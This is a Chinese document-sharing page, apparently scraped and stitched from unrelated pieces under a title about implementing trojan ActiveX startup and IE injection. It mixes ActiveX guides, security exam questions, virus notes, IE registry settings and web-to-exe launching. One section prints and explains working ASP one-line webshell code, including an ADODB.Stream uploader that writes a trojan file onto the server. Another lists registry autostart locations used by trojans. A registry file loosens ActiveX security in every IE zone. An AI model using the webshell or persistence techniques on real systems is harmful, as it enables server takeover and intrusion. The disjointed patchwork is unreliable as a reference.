编程实现木马的ActiveX启动和注入IE的启动方式

合集下载

microsoft web browser activex使用方法

microsoft web browser activex使用方法

microsoftwebbrowseractivex使用方法**一、概述**ActiveX是一种由Microsoft开发的控件,可用于在Web浏览器中嵌入和执行各种应用程序。

它允许开发人员创建在Internet上运行的自定义应用程序,并提供了一个方便的集成方式。

ActiveX也广泛用于Microsoft的InternetExplorer浏览器中。

**二、安装和启用**要使用ActiveX,首先需要确认您的操作系统是否支持。

通常,大多数现代操作系统都内置了ActiveX的支持。

对于Windows操作系统,您可以按照以下步骤进行安装和启用:1.打开控制面板,并找到“程序和功能”选项。

2.在程序列表中找到并选中“InternetExplorer”,然后点击“打开或关闭Windows功能”。

3.在打开的窗口中,找到ActiveX控件和插件复选框,勾选它们以启用ActiveX。

4.确认更改并重启浏览器。

**三、使用方法**一旦ActiveX被启用,您就可以在Web浏览器中使用它了。

下面是一些基本的使用方法:1.打开InternetExplorer并访问一个包含ActiveX控件的网站。

2.通常,您不需要做任何特殊操作,因为ActiveX控件会自动在您的浏览器中加载并开始工作。

3.如果您需要更改ActiveX控件的设置或属性,通常可以在浏览器的工具栏中找到相关的选项或菜单项。

4.如果您遇到任何问题或错误,请尝试查看浏览器的错误报告或调试工具,以获取更多信息。

**四、注意事项**1.请注意,不是所有的网站都支持ActiveX控件。

一些网站可能会阻止或限制ActiveX的使用,以保护用户的安全和隐私。

2.某些ActiveX控件可能包含不安全的漏洞,因此请务必保持您的浏览器和操作系统更新到最新版本,以获得最佳的安全性。

3.避免在不信任或不安全的网站上加载和使用未知来源的ActiveX控件。

总的来说,MicrosoftWeb浏览器中的ActiveX使用相对简单和直观。

网络安全期末考试复习资料

网络安全期末考试复习资料

网络安全期末考试复习资料网络安全复习资料1、下列不属于黑客攻击目的的是:(C)A、窃取信息B、获取口令C、给系统打补丁D、获取超级用户权限2、TCP/IP协议本身却具有很多的安全漏洞容易被黑客加以利用,但以下哪一层不会被黑客攻击(D)A、应用层B、传输层C、网际层D、都会被黑客攻击3. 攻击者通过外部计算机伪装成另一台合法机器来实现。

它能破坏两台机器间通信链路上的数据,其伪装的目的在于哄骗网络中的其它机器误将其攻击者作为合法机器加以接受,诱使其它机器向他发送据或允许它修改数据,此类型的攻击属于(B)?A.通过网络监听B.Ip地址欺骗C.口令攻击D.特洛伊木马4、下列不属于DDoS防范措施的是:(D)A、关闭不必要的服务。

B、限制同时打开的Syn半连接数目。

C、在网络防火墙上设置D、不安装DoS黑客工具5、下列不属于windows系统安全加固的方法是(B)A)安装最新的系统补丁B)打开帐号空连接C)删除管理共享D)激活系统的审计功能6、操作系统安全机制不包括(D)A)用户的登录B)文件和设备使用权限C)审计D)安装最新的系统补丁7、防范Windows操作系统中IPC$攻击的方法不包括(D)A)关闭帐号的空连接B)删除管理共享C)指定安全口令D )安装最新的系统补丁8、创建Web虚拟目录的用途是( C )。

A.用来模拟主目录的假文件夹B.用一个假的目录来避免感染病毒C.以一个固定的别名来指向实际的路径,当主目录改变时,相对用户而言是不变的D.以上都不对9、若系统存在Unicode漏洞,可采取补救办法不包括:(C)A限制网络用户访问和调用CMD命令的权限;B若没必要使用SCRIPTS和MSADC目录,将其全部删除或改名;C将IIS安装在主域控制器上D到Microsoft网站安装Unicode 漏洞补丁10、防范IE攻击的手段不包括(B)A、尽量避免访问一些不知名的网站B、控制网站访问次数C、预防恶意程序的运行D、利用杀毒软件11、MS SQL-SERVER空口令入侵无法实现的破坏是(B)A、将空口令服务器的数据库导出B、删除SA账号C、增加管理员D、格式化硬盘12、Access数据库下载漏洞防范措施不包括(A)A、在ASP程序中更改数据库连接方式为”DSN”B、设置复杂管理员口令,并MD5加密C、在数据库文件名前加一“#“D、在IIS中,数据库上右键属性中,设置文件不可以读取13、针对后台是SQL_Server的数据库注入攻击实现不了的功能是(B)A、查询数据库B、下载数据库C、收集程序及服务器的信息D、绕过登陆验证14. 保证网络安全的最主要因素(C)。

IE浏览器安全选项的注册表键值,修改注册表启用Activex控件的脚本

IE浏览器安全选项的注册表键值,修改注册表启用Activex控件的脚本
;显示混合内容
; (3=禁用、0=启用、1=提示)
"1609"=dword:00000000
;允许META REFRESH
; (3=禁用、0=启用)
"1608"=dword:00000000
;允许Microsoft网页浏览器控件的脚本
; (3=禁用、0=启用)
; IE6:允许Internet Exlorer Webbrowser控件的脚本
"2702"=dword:00000000
;允许Scriptlet
; (3=禁用、0=启用、1=提示)
; XP+IE6不存在此项
"1209"=dword:00000000
;允许运行以前未使用的ActiveX控件而不提示
; (3=禁用、0=启用)
; XP+IE6不存在此项
"1208"=dword:00000000
; .NET Framework -开始
;--------------------------------------------------
; XAML浏览器应用程序
; (3=禁用、0=启用、1=提示)
"2400"=dword:00000000
; XPS文档
; (3=禁用、0=启用、1=提示)
"2401"=dword:00000000
;允许对剪贴板进行编程访问
; (3=禁用、0=启用、1=提示)
; IE6:允许通过脚本进行粘贴操作
"1407"=dword:00000000
;允许网站使用脚本窗口提示获得信息
; (3=禁用、0=启用)

什么是ActiveX插件?

什么是ActiveX插件?

什么是ActiveX插件?自从Microsoft公司于1996年推出ActiveX技术以来, ActiveX技术已得到了许多软件公司的支持和响应, 并纷纷在其产品中融入ActiveX技术。

而作为ActiveX技术之一的ActiveX控件也得到了迅猛的发展, 不但各大软件公司推出了不少ActiveX 控件, ActiveX控件更是得到一般开发者的喜爱。

那么, 什么是ActiveX控件呢? ActiveX控件是一个动态链接库, 是作为基于COM服务器进行操作的, 并且可以嵌入在包容器宿主应用程序中, ActiveX控件的前身就是OLE控件。

由于ActiveX控件与开发平台无关, 因此, 在一种编程语言上开发的ActiveX控件可以无须任何修改, 即可在另一种编程语言中使用, 其效果如同使用Windows通用控件一样。

如: 在VC++中开发的ActiveX控件, 不作任何修改即可应用于VB中。

由此可见, 通过使用ActiveX控件即可实现快速小型的组件重用、实现代码共享, 从而提升编程效率。

从上面亦可看出为何ActiveX控件如此广泛地受到开发者的欢迎。

因为ActiveX控件的可重用性, 加上Internet的普及, ActiveX控件得到了极大的发展, 目前, 从Internet上可以得到相当多的ActiveX控件, 而且品种繁多, 所完成的任务几乎无所不包。

对一般开发者来说, 只要有耐心, 都能从Internet上找到符合自己要求的ActiveX控件。

从Internet下载的ActiveX控件,或从其他途径得到的ActiveX控件,用户应该怎样做才能正确使用ActiveX控件或将其应用于自己的程序中呢?一般来说,一个外来ActiveX控件要在Windows中被正确使用,首先必必需将控件文件〔*.OCX〕复制到硬盘中,然后将其在Windows中注册,未在Windows中注册过的ActiveX控件是不能使用的。

Windows核心编程之ActiveX

Windows核心编程之ActiveX

2.1 ActiveX控件介绍ActiveX是在M$与JAVA抗争时产生的一个新名词(1996年3月),ActiveX 技术的前身是OLE技术是M$为了适应Internet的发展对OLE进行的扩展(当时的含义是“Activeate the Internet”),当时只是为了发展一种小型的可从网络上快速下载的可重用组件。

但是随着ActiveX技术的发展ActiveX很快成为了M$新的口号。

ActiveX由定义WEB页面到OLE控件的所有内容发展到定义一种可重用组件技术的规范。

现在ActiveX已经成为一种概念和潮流。

ActiveX的基础是OLE和COM,但是通过M$的各种开发工具可以屏蔽掉COM 模型中许多另人费解的技术细节。

本节主要讨论如何开发ActiveX控件,其实这只是AcitveX组件技术中的一部分。

ActiveX组件技术包括以下一些方面:∙自动化服务器∙自动化控制器∙控件∙COM对象∙文档∙容器现在的ActiveX控件等价与以前的OLE控件或OCX,一个典型的控件包括设计时和运行时的用户界面,唯一的IDispatch接口定义了控件的属性和方法,唯一的IConnectionPoint接口定义控件可引发的事件。

一个控件可以在容器中运行,所以从运行的角度看它类似与一个DLL。

由于在IE中添加了对控件的支持,所以你可以在WEB页面中通过VBScript对控件进行操纵。

此外COM组件间在二进制上兼容,当其中一个组件的代码被修改并且被重新编译连接后只要能够保持原来已经存在并被使用的接口不变化(可以添加其他接口)那么其他使用这个组件的文件都不需要重编译。

所以利用COM组件技术可以很大程度上的提高软件重用性。

同样如果在程序中使用了ActiveX控件那么你在以后升级程序时可以单独升级控件而不需要升级整个程序。

在提供灵活性的同时会带来性能上的牺牲,但和ActiveX为我们代码的好处上看来这些牺牲都算不了什么。

《计算机病毒》复习思考题及答案

《计算机病毒》复习思考题及答案

《计算机病毒》复习思考题第一章计算机病毒概述1. 简述计算机病毒的定义和特征。

计算机病毒(Computer Virus),是一种人为制造的、能够进行自我复制的、具有对计算机资源进行破坏作用的一组程序或指令集合。

计算机病毒的可执行性(程序性)、传染性、非授权性、隐蔽性、潜伏性、可触发性、破坏性、攻击的主动性、针对性、衍生性、寄生性(依附性)、不可预见性、诱惑欺骗性、持久性。

2. 计算机病毒有哪些分类方法?根据每种分类方法,试举出一到两个病毒。

3. 为什么同一个病毒会有多个不同的名称?如何通过病毒的名称识别病毒的类型?国际上对病毒命名的一般惯例为“前缀+病毒名+后缀”,即三元组命名规则。

1、系统病毒系统病毒的前缀为:Win32、PE、Win95、W32、W95等。

2、蠕虫病毒蠕虫病毒的前缀是:Worm。

3、木马病毒、黑客病毒木马病毒其前缀是:Trojan,黑客病毒前缀名一般为Hack 。

4、脚本病毒脚本病毒的前缀是:Script。

5、宏病毒其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。

宏病毒的前缀是:Macro。

6、后门病毒后门病毒的前缀是:Backdoor。

7、病毒种植程序病毒后门病毒的前缀是:Dropper。

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。

8.破坏性程序病毒破坏性程序病毒的前缀是:Harm。

这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。

9.玩笑病毒玩笑病毒的前缀是:Joke。

10.捆绑机病毒捆绑机病毒的前缀是:Binder。

4. 简述计算机病毒产生的背景。

5. 计算机病毒有哪些传播途径?传播途径有两种,一种是通过网络传播,一种是通过硬件设备传播(软盘、U盘、光盘、硬盘、存储卡等)。

网络传播,又分为因特网传播和局域网传播两种。

硬件设备传播:通过不可移动的计算机硬件设备传播、通过移动存储设备传播、通过无线设备传播。

web上用Activex控件开发步骤

web上用Activex控件开发步骤
HRESULT hr = S_OK ;
hr = CoCreateInstance(CLSID_StdComponentCategoriesMgr,
NULL, CLSCTX_INPROC_SERVER, IID_ICatRegister, (void**)&pcr);
// 标记控件初始化安全.
// 创建初始化安全组件种类
hr = CreateComponentCategory(CATID_SafeForInitializing,
L"Controls safely initializable from persistent data!");
if (SUCCEEDED(hr))
{
// Register this category as being "implemented" by the class.
CATID rgcatid[1] ;
rgcatid[0] = catid;
return ResultFromScode(SELFREG_E_TYPELIB);
if (!COleObjectFactoryEx::UpdateRegistryAll(FALSE))
return ResultFromScode(SELFREG_E_CLASS);
// CICCardApp::ExitInstance - DLL termination
int CICCardApp::ExitInstance()
{
return COleControlModule::ExitInstance();
}
//////////////////////////////////////////////////////////////////////

IE浏览器控件安装与设置(ActiveX插件)

IE浏览器控件安装与设置(ActiveX插件)

电子商务WEB接入浏览器控件安装与设置浏览器设置1. Windows 7 操作系统中IE8的设置Windoews 7 操作系统本身自带的浏览器为IE8,下面介绍Windows7系统中的IE8在安装控件前的设置。

(1)取消弹出窗口阻止程序关闭弹出窗口阻止程序,工具→弹出窗口阻止程序→关闭弹出窗口阻止程序,如图0-1所示。

图0-1 弹出窗口阻止程序设置(2)可信任站点设置打开综合项目管理信息系统登陆地址(本说明中使用的是http://10.14.2.51:7001/pcpost ,具体请根据实现情况而定),将其设置为可信任站点,(工具>>Internet选项>>安全>>可信任站点站点按钮),如图0-2所示图0-2 IE可信任站点设置可信任站点安全级别设置,点击图0-3所示的“自定义级别”按钮,;在弹出的窗口中把ActiveX各选项设置为“提示”或是“启动”即可,如图0-4所示(在图中应该有九项需要设置,视实际情况而定)。

图0-3 可信任站点安全级别设置图0-4 ActiveX控件设置(3)在高级选项中设置(Iternet 选项 高级)把“启动内存保护减少联机攻击”的勾去掉,如所示。

图0-5 启动内存保护减少联机攻击操作界面注意:如果该选项前面的勾不允许取消,是灰色不可编辑状态时,请关闭浏览器,在桌面找到浏览器图标(C:\Program Files\Internet Explorer\iexplore.exe)右击浏览器选择“以管理员身份运行”,然后再去修改该选项即可。

图0-6 以管理员身份运行操作界面(4)兼容视图设置通过以上三步基本可以正常安装登陆控件了,如果还是显示不正常,请把登陆地址加入到兼容视图地址中(IE菜单下的工具选项),然后单击“兼容性视图(V)”,分别如图0-7、图0-8所示和图1-9 所示。

图0-7 兼容性视图设置菜单选项图0-8 兼容性视图地址设置图0-9 兼容性视图2. Windows 7 操作系统中的IE8以下版本浏览器设置执行上面(Windows 7 操作系统中IE8的设置)的(1)、(2)即可3.其它Windows操作系统中IE8浏览器设置执行上面(Windows 7 操作系统中IE8的设置)的(1)、(2)、(4)即可。

三种方法解决IE已经阻止此站点以不安全的方式使用ActiveX控件

三种方法解决IE已经阻止此站点以不安全的方式使用ActiveX控件

三种方法解决IE已经阻止此站点以不安全的方式使用ActiveX
控件
电脑出现IE已经阻止此站点以不安全的方式使用ActiveX控件,因此该网页无法正确显示”的处理办法"。

以下三类解决办法均尝试一下,直到可以为止。

方法1:.更改安全级别..打开IE.找到上方的工具-internet选项-安全,把那4个都设置下默认级别! 同时将工具-internet选项-隐私调为低
方法2:主菜单“工具”——Internet选项——安全——自定义级别,将“安全设置”中“对没有标记为安全的ActiveX”控件进行初始化和脚本运行由“禁用”改为“启用”
方法3:“工具” “Internet选项”“受信任的站点”“站点”,然后填入网址即可,如果这个网站不是以https:连接的把下面“对该区域中的所有站点要求服务器验证(https:)”前面的勾去掉即可。

IE允许ActiveX设置

IE允许ActiveX设置

设置ActiveX控件启用选项:(1)IE6.0版本的设置方法请您在IE浏览器菜单栏依次选择“工具”→“Internet选项”→“安全”→“internet”→“自定义级别”,然后将“ActiveX控件自动提示”、“标记为可安全执行脚本的ActiveX控件执行脚本”、“二进制脚本和行为”、“下载已签名控件”“运行ActiveX控件和插件”这五个选项选择为“启用”;将“对没有标记为安全的ActiveX控件进行初始化和脚本运行”、“下载未签名控件”选择为“提示”。

(2)IE7.0版本的设置方法请您在IE浏览器菜单栏依次选择“工具”→“Internet选项”→“安全”→“internet”→“自定义级别”,将“ActiveX”控件和插件相关设置进行如下调整:A、ActiveX控件自动提示:设置为“启用”;B、对标记为可安全执行脚本的ActiveX控件执行脚本:设置为“启用”;C、对未标记为可安全执行脚本的ActiveX控件初始化并执行脚本:设置为“提示”;D、二进制和脚本行为:设置为“启用”;E、下载未签名的ActiveX控件:设置为“提示”;F、下载已签名的ActiveX控件:设置为“提示”;G、允许scriptlet:默认原设置不做更改;H、允许运行以前未使用的ActiveX控件而不提示:设置为“禁用”;I、运行ActiveX控件和插件:设置为“启用”;J、在没有使用外部媒体播放机的网页上显示视频和动画:默认原设置不做更改;以上设置完成后点击“安全设置”窗口下方的“确定”键,返回到“Internet选项”中“安全”标签的页面,再次点击该页面下方的“确定”键,使更改完成。

(3)IE8.0版本的设置方法请您在IE浏览器菜单栏依次选择“工具”→“Internet选项”→“安全”→“internet”→“自定义级别”,将“ActiveX”控件和插件相关设置进行如下调整:A、ActiveX控件自动提示:启用B、对标记为可安全执行脚本的ActiveX控件执行脚本:启用C、对未标记为可安全执行脚本的ActiveX控件初始化并执行脚本:提示D、二进制和脚本行为:启用E、仅允许经过批准的域在未经提示的情况下使用ActiveX:启用F、下载未签名的ActiveX控件:提示G、下载已签名的ActiveX控件:提示H、允许scriptlet:默认原设置不更改I、允许运行以前未使用的ActiveX控件而不提示:禁用J、运行ActiveX控件和插件:启用K、在没有使用外部媒体播放机的网页上显示视频和动画:默认原设置不更改1、设置受信任站点请您在IE浏览器菜单栏依次选择“工具”→“Internet选项”→“安全”→“受信任的站点”→“站点”,在“站点”窗口打开后*.Y 。

病毒概述及病毒防护

病毒概述及病毒防护
18
黑客程序与特洛伊木马
黑客攻击的常用手段 1.包攻击。 黑客可利用一些工具产生畸形或碎片数据包,这些数据 包不能被计算机正确合成,从而导致系统崩溃。 2.服务型攻击。 这种攻击通常是黑客向计算机发送大量经过伪装的数据 包,使计算机疲于响应这些经过伪装的不可到达客户的请求,从而使计 算机不能响应正常的客户请求,或使计算机误以为访问的主机不可到达 ,从而达到切断正常连接的目的。 3.缓冲区溢出攻击。 这种攻击是向操作系统或应用程序发送超长字符串,由 于程序本身设计的漏洞,未能对其进行有效的检验,导致程序在缓冲区 溢出时意外出错甚至退出,使黑客获得到系统管理员的权限。 4.口令攻击。 这种攻击一般是依据一个包含常用单词的字典文件、程 序进行大量的猜测,直到猜对口令并获得访问权为止。它通常使用蛮力 攻击方式。 19
中国联通成分维护人员培训-计算机及办公网络故障处理
病毒概述与病毒防 护
1
局域网基础及病毒防护 病毒--多层感染途径
3. 第三是通过软盘和盗版光盘传播病毒
NT Server
2. 第二是通过Internet 浏览、下载(HTTP、FTP)
Windows NT/2000
防火墙
Internet Email 网关
4
计算机病毒的概述
计算机病毒的产生原因 (1)软件产品的脆弱性是产生计算机病毒根本的技 术原因。 (2)社会因素是产生计算机病毒的土壤。 计算机病毒的传播途径 计算机病毒主要是通过复制文件、发送文件、运 行程序等操作传播的。通常有以下几种传播途径: 1.移动存储设备。包括软盘、硬盘、移动硬盘、 光盘、磁带等。 2.网络。由于网络覆盖面广、速度快,为病毒的 快速传播创造了条件。目前大多数新式病毒都是通过网络进行 传播的,破坏性很大。

浏览器安全问题导致activex不能使用的终极解决办法

浏览器安全问题导致activex不能使用的终极解决办法

浏览器安全问题导致activex不能使⽤的终极解决办法不废话,直接说办法:1、将浏览器的internet选项中的internet和本机internet的安全设置中的对不安全的activex控件标记为可⽤设置启⽤。

2、将要访问的⽹址的域名加⼊信任站点,这点很重要。

3、你的activex控件最好事先在本机注册⼀下(可有可⽆)。

由于很多客户不懂怎么操作,所以写了⼀个注册表⽂件,只要⽤户执⾏⼀下这个⽂件就⾏,注册表内容如下:Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost] "http"=dword:00000002"https"=dword:00000002[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]@="""1201"=dword:00000001"1200"=dword:00000000"1004"=dword:00000001"2201"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]@="""1201"=dword:00000001"1200"=dword:00000000"1004"=dword:00000001"2201"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]@="""1201"=dword:00000001"1200"=dword:00000000"1004"=dword:00000001"2201"=dword:00000000[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]@="""1201"=dword:00000001"1200"=dword:00000000"1004"=dword:00000001"2201"=dword:00000000中国红盟.因为专业所以信赖!中国红盟():您⾝边的服务器.⽹站安全专家.。

关于木马病毒的六种启动方式

关于木马病毒的六种启动方式

关于木马病毒的六种启动方式木马是随计算机或Windows的启动而启动并掌握一定的控制权的,其启动方式可谓多种多样,通过注册表启动、通过System.ini启动、通过某些特定程序启动等,真是防不胜防。

其实只要能够遏制住不让它启动,木马就没什么用了,这里就简单说说木马的启动方式,知己知彼百战不殆嘛。

一、通过"开始\程序\启动"隐蔽性:2星应用程度:较低这也是一种很常见的方式,很多正常的程序都用它,大家常用的QQ就是用这种方式实现自启动的,但木马却很少用它。

因为启动组的每人会会出现在“系统配置实用程序”(msconfig.exe,以下简称msconfig)中。

事实上,出现在“开始”菜单的“程序\启动”中足以引起菜鸟的注意,所以,相信不会有木马用这种启动方式。

二、通过Win.ini文件隐蔽性:3星应用程度:较低同启动组一样,这也是从Windows3.2开始就可以使用的方法,是从Win16遗传到Win32的。

在Windows3.2中,Win.ini就相当于Windows9x中的注册表,在该文件中的[Windows]域中的load和run项会在Windows启动时运行,这两个项目也会出现在msconfig中。

而且,在Windows98安装完成后这两项就会被Windows的程序使用了,也不很适合木马使用。

三、通过注册表启动1、通过HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 和HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServi ces隐蔽性:3.5星应用程度:极高应用案例:BO2000,GOP,NetSpy,IEthief,冰河……这是很多Windows程序都采用的方法,也是木马最常用的。

从浏览器启动客户端程序

从浏览器启动客户端程序

从浏览器启动客户端程序∙综述现在有很多B/S与C/S相结合的产品,会出现一种需求:从浏览器启动客户端的程序,并且如果客户端未安装相应程序,先提示安装。

主流的几款产品:腾讯QQ、阿里旺旺、迅雷、PPLive等,都有实现了类似的功能。

浏览器启动客户端程序可以通过注册自定义的Url协议来实现,而检测客户端是否安装程序需要利用ActiveX控件。

要额外注意的是,现在只有IE浏览器才支持。

∙客户端程序先准备一个简单的客户端程序,只用来显示传入的命令行参数。

Client1namespace wuhong.Client2{3class Program4 {5static void Main(string[] args)6 {7if (args != null && args.Length > 0)8 {9 Array.ForEach(args, arg => Console.WriteLine(arg));10 }1112 Console.ReadLine();13 }14 }15}----------------------------精品word文档值得下载值得拥有----------------------------------------------从浏览器启动注册自定义的Url协议,这样当用户点击这个URL协议的链接后,IE就会启动相关URL协议的处理器,使用注册的程序来处理这个协议。

具体来说,比如现在需要注册“wuhong.client”的Url协议,使得形如“wuhong.client:XXXXYYYY”的链接都由上节的控制台程序来处理。

这一切只需要在客户端安装控制台程序的同时向注册表添加下面的项就可以实现:注册表1[HKEY_CLASSES_ROOT\wuhong.client]23@="wuhong.Client"45"URL Protocol"=""67[HKEY_CLASSES_ROOT\wuhong.client\DefaultIcon]89@=" wuhong.Client.exe "1011[HKEY_CLASSES_ROOT\wuhong.client\Shell]1213[HKEY_CLASSES_ROOT\wuhong.client\Shell\open]1415[HKEY_CLASSES_ROOT\wuhong.client\Shell\open\command]1617@="\"[TARGETDIR]wuhong.Client.exe\" \"%1\""解释一下其中几项:[HKEY_CLASSES_ROOT\wuhong.client]默认项和URL Protocol项的值都是设置一个名称。

【计算机系统安全】26恶意代码

【计算机系统安全】26恶意代码
使用TCP协议,服务端侦听,客户端连接。这是最 简单,最早,最广泛使用的一种通讯方案。
使用工具可以很容易的发现在某一端口上侦听的进 程,以及进程对应的可执行文件。
如果服务端装有防火墙,那么客户端发起的连接就 会被防火墙拦截。
如果局域网内通过代理上网的电脑,因为本机没有 独立的IP地址(只有局域网的IP地址),所以也不能 正常使用。
如RootKit、Hkdef、ByShell…
6. 拒绝服务程序,黑客工具,广告软件,间谍 软件,恶意网页……
6
病毒发展史(续1)
引导区病毒
基于文件的病毒
邮件群发病毒
台式电脑
第1代 网络病毒
台式电脑
LAN服务器
台式电脑 台式电脑 台式电脑
第2代
互联网 防毒墙
电子邮件 服务器墙
笔记本电脑
第3代
台式电脑
未修补漏洞的系统 已修补漏洞的系统
WORM_SASSER.A
染毒电脑
被感染
不被感染
随机攻击
不被感染
被感染 被感染
随机攻击
不被感染
Internet
随机攻击
不被感染
16
群发邮件型蠕虫
特点:种类、变种众多,是最常见的一类蠕虫病毒
求职信(I-Worm/Klez) 大无极(I-Worm/Sobig) 网络天空(I-Worm/Netsky) 雏鹰(I-Worm/BBEagle) 挪威客(I-Worm/MyDoom)
28
加载方式
开始菜单的启动项,基本上没有木马会用这种方式。 在Winstart.bat中启动。 在Autoexec.bat和Config.sys中加载运行。 win.ini/system.ini:有部分木马采用,不太隐蔽。 注册表:隐蔽性强,多数木马采用。 服务:隐蔽性强,多数木马采用。 修改文件关联。

eval一句话木马原理详解

eval一句话木马原理详解

eval一句话木马原理详解eval一句话木马原理详解<%eval request("#")%>来解释下它的原理.首先是JavaScript脚本的开始标记,其中RUNA T属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码: set iP=server.createObject("Adodb.Stream")iP.OpeniP.Type=2iP.CharSet="gb2312"iP.writetext request("aoyun")iP.SaveToFile server.mappath("aoyunwan.asp"),2iP.Closeset iP=nothingresponse.redirect "aoyunwan.asp"学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了:set iP=server.createObject("Adodb.Stream")iP.OpeniP.Type=2iP.CharSet="gb2312"iP.writetext request("aoyun")iP.SaveToFile server.mappath("aoyunwan.asp"),2iP.Closeset iP=nothingresponse.redirect "aoyunwan.asp"学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用该对象的writetext方法将request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea标记中的内容,也就是我们的大马的代码)写入服务端的aoyunwan.asp文件中,写入结束后使用set iP=nothing 释放Adodb.Stream对象然后使用response.redirect "aoyunwan.asp" 转向刚才写入大马代码的文件,也就是我们最后看见的大马了!不过一句话木马能成功的条件依赖于两个条件:一、服务器端没有禁止Adodb.Stream组件,因为我们使用一句话木马写入大马代码的条件是服务器端创建Adodb.Stream组件,如果该组件被禁用的话是不会写入成功的!二、还有就是权限的问题,如果当前的虚拟目录禁止user组或者everyone写入操作的话那么也是不会成功的.============一句话木马"服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp 为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为<%execute request("value")%> 其中value可以自己修改"一句话木马"客户端用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件一句话木马客户端源文件:里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了***********************************************************//"action="后面是需要修改的以asp命名的数据库的提交地址//这个标签的意思是建立一个表单以post方式提交给连接/doc/d916207664.html,/news/ebook/db/ebook .asp处理//这里的value值根据服务端<%execute request("value")%>中value而设定//可以自行修改成<%execute request("p")%>相应这里的value 值也必须改为pset lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("joeving") //取得木马内容参数joeving可以自己定义但必须和下面的name=joeving相对应lP.SaveToFile server.mappath("wei.asp"),2//将木马内容以覆盖文件的方式写入wei.asp//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp//但和下面的response.redirect"wei.asp"中wei.asp的保持一致lP.Close //关闭对象set lP=nothing //释放对象response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登陆界面。

计算机木马病毒介绍

计算机木马病毒介绍

具有自动运行性
在系统启动时即跟随着启动,所以必须潜入在你的启动配置文件中如win.ini system.ini winstart.bat及启动组等文件中
包含具有未公开并且可能产生危险后果的功能的程序 具备自动恢复功能
现在很多木马程序中的功能模块不再由单一的文件组成,而是具有多重备份,可以相互恢复
能自动打开特别的端口 功能的特殊性
除普通的文件操作以外,有此木马具有搜索cache中的口令、设置口令、扫描目标机器的IP地 址、进行键盘记录、远程注册表的操作以及锁定鼠标功能
木马病毒的判断
当你浏览一个网络,弹出一些广告窗口是很正常的事情, 可是如果你根本没有打开浏览器,而浏览器突然自己打开, 并且进入某个网站 系统配置老是自动被更改,比如屏保显示的文字,时间和 日期,声音大小,还有CDROM自动运行配置 硬盘老没缘由的读盘,软驱灯经常自己亮起,网络连接及 鼠标屏幕出现异常现象
自我销毁
打开含有木马的文件后,木马会将自己拷贝到WINDWOS的系统文件夹下 源木马文件和系统文件夹中的木马文件大小是一样的,用户在近来收到的信件和 下载的软件中找到源木马文件,根据大小去系统文件夹中找相同大小的文件,判 断下哪个是木马就行了,而此种木马我自我销毁功能。在没查杀木马的工具帮助 下,就很难删除木马了
键盘记录木马
记录受害者的键盘敲击并且在LOG文件里查找密码 随着WINDOWS的启动而启动, 有在线和离线记录选项, 对于这种类型的木马,邮件发送功能也是必不可少的
木马的种类
DoS攻击木马
入侵一台计算机种上DoS攻击木马,此机成为日后DoS攻击的最 得力助手 控制的肉鸡数量越多,你发动DoS攻击取得的成功率就越大 此类木马不体现在被感染的计算机,而是体现在攻击者可以利用 它来攻击一台又一台计算机,给网络造成伤害和带来损失 类似DoS的木马叫做邮件炸弹木马,一旦机器被感染,木马就会 随机生成各种各样主题的信件,对特定的邮箱不停地发送邮件, 一直到对方瘫痪,不能接受邮件为止

网页超链接调用本地exe程序

网页超链接调用本地exe程序

网页超链接调用本地exe程序由于项目需要将VC MFC做的视频监控程序嵌入到web页面里,因此才开始研究这方面,类似于我们点击了迅雷下载,那么系统默认就会启动迅雷程序一样。

按照微软的推荐,应该通过ActiveX,把可执行程序嵌入到网页中,但是我们要购买ActiveX签名,这种方式对于个人来讲并不合理。

最早的方式就是js调用,但是肯定不安全,因为这样做时木马病毒程序无法阻止,会给用户带来灾难性的后果,当然,IE6之后,微软就不再允许这种调用方式。

于是就想起平时网页的弹出框功能了,包括远程登录Telnet,淘宝的阿里旺旺等,于是就去分析实现的原理。

原来这些程序在注册表里都有对应的项,因此当点击时,就会默认执行这些程序。

到这里原理就很明白了,我们就可以把自己写好的程序打包成exe文件,然后把执行该exe程序的路径信息写进注册表,在网页超链接中,就可以利用(协议://参数),exe接收该参数,然后执行。

